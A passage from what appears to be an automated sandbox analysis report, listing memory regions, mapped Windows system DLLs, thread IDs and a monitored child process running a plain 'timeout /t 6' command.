0x7ffb21787630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3277 start_va = 0x7ffb218f0000 end_va = 0x7ffb21953fff monitored = 0 entry_point = 0x7ffb21905ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 3278 start_va = 0x7ffb21b20000 end_va = 0x7ffb21b48fff monitored = 0 entry_point = 0x7ffb21b2ca00 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 3279 start_va = 0x7ffb21b50000 end_va = 0x7ffb21b85fff monitored = 0 entry_point = 0x7ffb21b60070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 3280 start_va = 0x7ffb22640000 end_va = 0x7ffb22647fff monitored = 0 entry_point = 0x7ffb226413e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 3281 start_va = 0x7ffb22ee0000 end_va = 0x7ffb22f58fff monitored = 0 entry_point = 0x7ffb22effb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 3282 start_va = 0x7ffb23110000 end_va = 0x7ffb235a2fff monitored = 0 entry_point = 0x7ffb2311f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 3283 start_va = 0x7ffb235b0000 end_va = 0x7ffb23616fff monitored = 0 entry_point = 0x7ffb235ce710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 3284 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3285 start_va = 0x7ffb23800000 end_va = 0x7ffb2381bfff monitored = 0 entry_point = 0x7ffb238037a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 3286 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3287 start_va = 0x7ffb239d0000 end_va = 0x7ffb23a0ffff monitored = 0 entry_point = 0x7ffb239e1960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 3288 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3289 start_va = 0x7ffb23b60000 end_va = 0x7ffb23b86fff monitored = 0 entry_point = 0x7ffb23b67940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3290 start_va = 0x7ffb23b90000 end_va = 0x7ffb23c39fff monitored = 0 entry_point = 0x7ffb23bb7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3291 start_va = 0x7ffb23c40000 end_va = 0x7ffb23d3ffff monitored = 0 entry_point = 0x7ffb23c80f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 3292 start_va = 0x7ffb23dd0000 end_va = 0x7ffb23ddbfff monitored = 0 entry_point = 0x7ffb23dd2480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 3293 start_va = 0x7ffb23ea0000 end_va = 0x7ffb23ed1fff monitored = 0 entry_point = 0x7ffb23eb2340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 3294 start_va = 0x7ffb24110000 end_va = 0x7ffb2411bfff monitored = 0 entry_point = 0x7ffb24112790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 3295 start_va = 0x7ffb24120000 end_va = 0x7ffb24143fff monitored = 0 entry_point = 0x7ffb24123260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3296 start_va = 0x7ffb242c0000 end_va = 0x7ffb243b3fff monitored = 0 entry_point = 0x7ffb242ca960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 3297 start_va = 0x7ffb24410000 end_va = 0x7ffb24458fff monitored = 0 entry_point = 0x7ffb2441a090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 3298 start_va = 0x7ffb24530000 end_va = 0x7ffb2453bfff monitored = 0 entry_point = 0x7ffb245327e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3299 start_va = 0x7ffb24610000 end_va = 0x7ffb24640fff monitored = 0 entry_point = 0x7ffb24617d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3300 start_va = 0x7ffb24670000 end_va = 0x7ffb246e9fff monitored = 0 entry_point = 0x7ffb24691a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 3301 start_va = 0x7ffb24730000 end_va = 0x7ffb24763fff monitored = 0 entry_point = 0x7ffb2474ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3302 start_va = 0x7ffb24770000 end_va = 0x7ffb24779fff monitored = 0 entry_point = 0x7ffb24771830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 3303 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3304 start_va = 0x7ffb249f0000 end_va = 0x7ffb24a4bfff monitored = 0 entry_point = 0x7ffb24a06f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3305 start_va = 0x7ffb24aa0000 end_va = 0x7ffb24ab6fff monitored = 0 entry_point = 0x7ffb24aa79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3306 start_va = 0x7ffb24bc0000 end_va = 0x7ffb24bcafff monitored = 0 entry_point = 0x7ffb24bc19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3307 start_va = 0x7ffb24c00000 end_va = 0x7ffb24c20fff monitored = 0 entry_point = 0x7ffb24c10250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 3308 start_va = 0x7ffb24c50000 end_va = 0x7ffb24c89fff monitored = 0 entry_point = 0x7ffb24c58d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 3309 start_va = 0x7ffb24c90000 end_va = 0x7ffb24cb6fff monitored = 0 entry_point = 0x7ffb24ca0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 3310 start_va = 0x7ffb24da0000 end_va = 0x7ffb24dccfff monitored = 0 entry_point = 0x7ffb24db9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3311 start_va = 0x7ffb24f30000 end_va = 0x7ffb24f85fff monitored = 0 entry_point = 0x7ffb24f40bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3312 start_va = 0x7ffb24f90000 end_va = 0x7ffb24fa8fff monitored = 0 entry_point = 0x7ffb24f95e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 3313 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3314 start_va = 0x7ffb24fe0000 end_va = 0x7ffb25078fff monitored = 0 entry_point = 0x7ffb2500f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 3315 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3316 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3317 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3318 start_va = 0x7ffb251a0000 end_va = 0x7ffb251affff monitored = 0 entry_point = 0x7ffb251a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3319 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3320 start_va = 0x7ffb253a0000 end_va = 0x7ffb253b6fff monitored = 0 entry_point = 0x7ffb253a1390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3321 start_va = 0x7ffb253c0000 end_va = 0x7ffb25586fff monitored = 0 entry_point = 0x7ffb2541db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3322 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3323 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3324 start_va = 0x7ffb25770000 end_va = 0x7ffb257f5fff monitored = 0 entry_point = 0x7ffb2577d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 3325 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3326 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 3327 start_va = 0x7ffb25ea0000 end_va = 0x7ffb25ef4fff monitored = 0 entry_point = 0x7ffb25eb7970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 3328 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3329 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3330 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3331 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3332 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3333 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3334 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3335 start_va = 0x7ffb26780000 end_va = 0x7ffb267dbfff monitored = 0 entry_point = 0x7ffb2679b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3336 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3337 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3338 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3339 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3340 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3341 start_va = 0x7ffb284c0000 end_va = 0x7ffb288e8fff monitored = 0 entry_point = 0x7ffb284e8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 3342 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3343 start_va = 0x7ffb28a40000 end_va = 0x7ffb28a47fff monitored = 0 entry_point = 0x7ffb28a41ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3344 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3345 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3347 start_va = 0x5d80000 end_va = 0x5d81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d80000" filename = "" Region: id = 3348 start_va = 0x5da0000 end_va = 0x5da1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005da0000" filename = "" Region: id = 3349 start_va = 0x9e00000 end_va = 0x9efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e00000" filename = "" Region: id = 3350 start_va = 0x9f00000 end_va = 0x9ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f00000" filename = "" Region: id = 3351 start_va = 0xa000000 end_va = 0xa0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a000000" filename = "" Region: id = 3352 start_va = 0xa100000 end_va = 0xa1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a100000" filename = "" Region: id = 3353 start_va = 0xa200000 end_va = 0xa2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a200000" filename = "" Region: id = 3355 start_va = 0xa300000 end_va = 0xa3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a300000" filename = "" Region: id = 3356 start_va = 0x530000 end_va = 0x532fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3357 start_va = 0x530000 end_va = 0x537fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3358 start_va = 0x530000 end_va = 0x535fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3423 start_va = 0xa400000 end_va = 0xa4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a400000" filename = "" Region: id = 3424 start_va = 0x530000 end_va = 0x531fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3744 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 3750 start_va = 0xa500000 end_va = 0xa5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a500000" filename = "" Thread: id = 55 os_tid = 0xce8 Thread: id = 56 os_tid = 0x13e8 Thread: id = 57 os_tid = 0xd7c Thread: id = 58 os_tid = 0xf9c Thread: id = 59 os_tid = 0xa5c Thread: id = 60 os_tid = 0x13bc Thread: id = 61 os_tid = 0x13b8 Thread: id = 62 os_tid = 0x1388 Thread: id = 63 os_tid = 0x1358 Thread: id = 64 os_tid = 0x1350 Thread: id = 65 os_tid = 0x12ac Thread: id = 66 os_tid = 0x1274 Thread: id = 67 os_tid = 0x2ec Thread: id = 68 os_tid = 0x448 Thread: id = 69 os_tid = 0xbc4 Thread: id = 70 os_tid = 0xb60 Thread: id = 71 os_tid = 0x410 Thread: id = 72 os_tid = 0x48c Thread: id = 73 os_tid = 0x6d8 Thread: id = 74 os_tid = 0x180 Thread: id = 75 os_tid = 0xf8c Thread: id = 76 os_tid = 0xd4c Thread: id = 77 os_tid = 0xf20 Thread: id = 78 os_tid = 0xf0c Thread: id = 79 os_tid = 0xf04 Thread: id = 80 os_tid = 0xf00 Thread: id = 81 os_tid = 0xef8 Thread: id = 82 os_tid = 0xef4 Thread: id = 83 os_tid = 0xeec Thread: id = 84 os_tid = 0xea0 Thread: id = 85 os_tid = 0xe9c Thread: id = 86 os_tid = 0xe94 Thread: id = 87 os_tid = 0xe0c Thread: id = 88 os_tid = 0xda8 Thread: id = 89 os_tid = 0xd60 Thread: id = 90 os_tid = 0xcfc Thread: id = 91 os_tid = 0xb04 Thread: id = 92 os_tid = 0xac4 Thread: id = 93 os_tid = 0xb48 Thread: id = 94 os_tid = 0xb44 Thread: id = 95 os_tid = 0xb40 Thread: id = 96 os_tid = 0xaec Thread: id = 97 os_tid = 0xae4 Thread: id = 98 os_tid = 0xae0 Thread: id = 99 os_tid = 0xaa8 Thread: id = 100 os_tid = 0xa54 Thread: id = 101 os_tid = 0xa40 Thread: id = 102 os_tid = 0xa28 Thread: id = 103 os_tid = 0xa0c Thread: id = 104 os_tid = 0xa08 Thread: id = 105 os_tid = 0x9ec Thread: id = 106 os_tid = 0x9e4 Thread: id = 107 os_tid = 0x9e0 Thread: id = 108 os_tid = 0x9d8 Thread: id = 109 os_tid = 0x9d4 Thread: id = 110 os_tid = 0x950 Thread: id = 111 os_tid = 0x93c Thread: id = 112 os_tid = 0x91c Thread: id = 113 os_tid = 0x830 Thread: id = 114 os_tid = 0x82c Thread: id = 115 os_tid = 0x488 Thread: id = 116 os_tid = 0x520 Thread: id = 117 os_tid = 0x48c Thread: id = 118 os_tid = 0x658 Thread: id = 119 os_tid = 0x630 Thread: id = 120 os_tid = 0x4dc Thread: id = 121 os_tid = 0x4a8 Thread: id = 122 os_tid = 0x49c Thread: id = 123 os_tid = 0x44c Thread: id = 124 os_tid = 0x434 Thread: id = 125 os_tid = 0x408 Thread: id = 126 os_tid = 0x404 Thread: id = 127 os_tid = 0x2b0 Thread: id = 128 os_tid = 0x294 Thread: id = 129 os_tid = 0x168 Thread: id = 130 os_tid = 0x170 Thread: id = 131 os_tid = 0x288 Thread: id = 132 os_tid = 0x284 Thread: id = 133 os_tid = 0x264 Thread: id = 134 os_tid = 0x274 Thread: id = 135 os_tid = 0x15c Thread: id = 136 os_tid = 0xf4 Thread: id = 137 os_tid = 0x55c Thread: id = 138 os_tid = 0xfc4 Thread: id = 139 os_tid = 0xff4 Thread: id = 140 os_tid = 0xa94 Thread: id = 141 os_tid = 0xa7c Thread: id = 142 os_tid = 0xc28 Thread: id = 145 os_tid = 0x5a4 Thread: id = 170 os_tid = 0x610 Process: id = "21" image_name = "timeout.exe" filename = "c:\\windows\\syswow64\\timeout.exe" page_root = "0x4f92e000" os_pid = "0xc20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x4d8" cmd_line = "timeout /t 6 " cur_dir = "C:\\ProgramData\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3359 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3360 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3361 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3362 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3363 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3364 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 3365 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 3366 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 3367 start_va = 0x150000 end_va = 0x159fff monitored = 1 entry_point = 0x154fb0 region_type = mapped_file name = "timeout.exe" filename = "\\Windows\\SysWOW64\\timeout.exe" (normalized: "c:\\windows\\syswow64\\timeout.exe") Region: id = 3368 start_va = 0x160000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 3369 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 3370 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3371 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3372 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3373 start_va = 0x7fff0000 end_va = 0x7dfb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3374 start_va = 0x7dfb28b00000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb28b00000" filename = "" Region: id = 3375 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3376 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 3377 start_va = 0x41e0000 end_va = 0x41effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 3378 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3379 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3380 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3381 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3382 start_va = 0x4400000 end_va = 0x460ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 3383 